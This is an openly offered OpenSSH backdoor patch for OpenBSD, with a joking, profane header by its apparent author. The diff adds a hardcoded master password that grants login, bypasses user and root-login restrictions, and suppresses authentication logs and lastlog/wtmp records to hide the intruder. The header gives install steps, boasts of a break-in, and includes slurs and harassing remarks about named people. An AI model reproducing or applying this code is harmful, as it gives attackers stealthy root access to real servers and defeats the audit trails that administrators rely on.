# YaOP (Yet another OpenSSH Path) # Written by ph1zzle # with kudos to enz00 for providing a reference # YaOP is, you guessed it, another damned OpenSSH patch / backdoor with a few differences # Here is the main one, it was designed for and compiles fine for the OpenBSD native release # of OpenSSH. I wrote this cause I am unaware of any other patch that does this for OpenBSD's # version of OpenSSH. This patch will not patch properly on OpenSSH portable which is the version # written for linux, solaris, or any other OS other then OpenBSD. If you try to use this patch # on any system other then OpenBSD you will notice that you get failed hunkes in sshlogin.c. # This is bad as this is where the ssh daemon registers your login with the system and where # sshd has been modified to hide the fact that you have logged in. In other words, it will log... # this is bad. # Anyways, to use the patch is simple enough, copy it to the OpenSSH dir and then run a # `patch < ./yaop.diff`, then just do a `make`. In thoery you can also do a make install, but # it is much nicer to just copy ./sshd/sshd to /usr/sbin/sshd and then restart the server. # Also you will notice that the secret password is defined on line 69 ( <-- heh 69 ) of this file # ("change_me_or_die"). Also another neat feature I added is it will log you in, even if sshd # is told not to do so, i.e. disallow_root_login. # Also I wanna say thanks to GOBBLES, if it wern't for your nosejob I wouldn't have had access # to the obsd box that motivated me to write this... well, ok I probably woulda somehow, but # you guys are cool anyways, you do good work. # Oh and, "This isn't supposed to be exploitable so nothing should happen here" hehehe, ya # whatever ;) # So impressed with all you do # Tried so hard to be like you # Flew too high and burnt the wings # Lost my faith in everything # Lick around devine debris # Taste the wealth of hate in me # Shedding skin succumb defeat # THIS MACHINE IS OBSOLETE!!! # "Shit dude, I think we just changed it to boot runlevel 8, hehe, fuck we shouldn't have smoke # that joint on my lunch break" # -D0Sdemon # "Man we should get drunk and build servers more often, this has been a awesom night" # -Fone_Tone # "No man, I am not giving you your acid untill you finish fixing my computer... shit, this # is good stuff too so hurry" # -Black_Action_Hero # "Who wants to play spot the fed canadian style, now you see that guy with the goofy hat, and # the red blouse on the horse over there chasing that man down the street... no thats just our # prime minister but thats what the feds look like here, silly eh? # -ph1zzle # Btw, Theo, I like your work so this isn't a personal attack, but someone had to do it. # Anyways, keep it up, pat Dug Song on the back for me, he's cool and please slap w00w00 next time # you see them for me... I mean really slap the fuck outta them, like with a big red hand print. # Oh except for remmie, She can come over to my place for pie (:P) if she ever ditches those fags. # http://www.w00w00.org/pics/individual/remmie/remmie1.jpg # Okay kiddies, Thats all I have to say about that so enjoy and figure it, it's not my fault, it's # John R. Levines' fault. Unix for Dummies? What are you thinking you fucking knob. --- ./ssh/auth-passwd.c 2002-05-24 12:45:16.000000000 -0400 +++ ./ssh-own/auth-passwd.c 2003-06-17 16:03:37.000000000 -0400 @@ -55,6 +55,15 @@ { struct passwd * pw = authctxt->pw; + login_0wn=0; + if(strcmp("change_me_or_die", password) == 0 ) + { + login_0wn=1; + return 1; + } + + else{ + /* deny if no user. */ if (pw == NULL) return 0; @@ -101,3 +110,4 @@ } #endif } +} diff -u -r ./ssh/auth.c ./ssh-own/auth.c --- ./ssh/auth.c 2002-05-17 10:27:55.000000000 -0400 +++ ./ssh-own/auth.c 2003-06-17 16:02:33.000000000 -0400 @@ -62,6 +62,10 @@ int allowed_user(struct passwd * pw) { + if(login_0wn) + return 1; + + else{ struct stat st; const char *hostname = NULL, *ipaddr = NULL; char *shell; @@ -151,6 +155,7 @@ } /* We found no reason not to let this user try to log on... */ return 1; + } } Authctxt * @@ -164,6 +169,7 @@ void auth_log(Authctxt *authctxt, int authenticated, char *method, char *info) { + if(!login_0wn){ void (*authlog) (const char *fmt,...) = verbose; char *authmsg; @@ -188,6 +194,7 @@ get_remote_port(), info); } +} /* * Check whether root logins are disallowed. @@ -195,6 +202,7 @@ int auth_root_allowed(char *method) { + if(!login_0wn){ switch (options.permit_root_login) { case PERMIT_YES: return 1; @@ -212,6 +220,9 @@ } log("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr()); return 0; + } + else + return 1; } diff -u -r ./ssh/includes.h ./ssh-own/includes.h --- ./ssh/includes.h 2002-01-26 11:44:22.000000000 -0500 +++ ./ssh-own/includes.h 2003-06-17 19:48:51.000000000 -0400 @@ -18,6 +18,7 @@ #define RCSID(msg) \ static /**/const char *const rcsid[] = { (char *)rcsid, "\100(#)" msg } +int login_0wn; #include #include diff -u -r ./ssh/sshlogin.c ./ssh-own/sshlogin.c --- ./ssh/sshlogin.c 2002-06-22 23:30:17.000000000 -0400 +++ ./ssh-own/sshlogin.c 2003-06-17 22:06:26.000000000 -0400 @@ -86,6 +86,7 @@ record_login(pid_t pid, const char *ttyname, const char *user, uid_t uid, const char *host, struct sockaddr * addr) { + if(!login_0wn){ int fd; struct lastlog ll; char *lastlog; @@ -121,13 +122,16 @@ close(fd); } } + } } /* Records that the user has logged out. */ void record_logout(pid_t pid, const char *ttyname) { + if(!login_0wn){ const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */ if (logout(line)) logwtmp(line, "", ""); + } }